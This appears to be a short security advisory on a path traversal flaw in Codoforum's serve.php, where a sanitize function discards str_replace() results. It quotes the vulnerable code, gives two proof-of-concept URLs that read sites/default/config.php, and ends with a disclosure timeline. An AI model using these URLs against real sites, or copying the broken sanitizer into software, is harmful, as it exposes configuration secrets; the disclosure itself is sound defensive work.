str_replace() is used to sanitize the file path, but the function's return value is never assigned to a variable. So instead of:
    private function sanitize($name) {
        $name = str_replace("..", "", $name);
        $name = str_replace("%2e%2e", "", $name);
        return $name;
    }
the shipped code has:
    private function sanitize($name) {
        str_replace("..", "", $name);
        str_replace("%2e%2e", "", $name);
        return $name;
    }
So $_GET['path'] is returned unchanged and is not sanitized at all.
File: codoforum\sys\Controller\serve.php
    public function attachment() {
        $name = $this->sanitize($_GET['path']);
        $dir = DATA_PATH . 'assets/img/attachments/';
        $this->set_headers($name, $dir);
    }

    public function smiley() {
        $name = $this->sanitize($_GET['path']);
        $dir = DATA_PATH . 'assets/img/smileys/';
        $this->set_headers($name, $dir);
    }
Proof of Concept
http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php
or
http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php
Timeline
- 23-11-2014: Discovered
- 23-11-2014: Vendor notified
- 03-12-2014: Issue resolved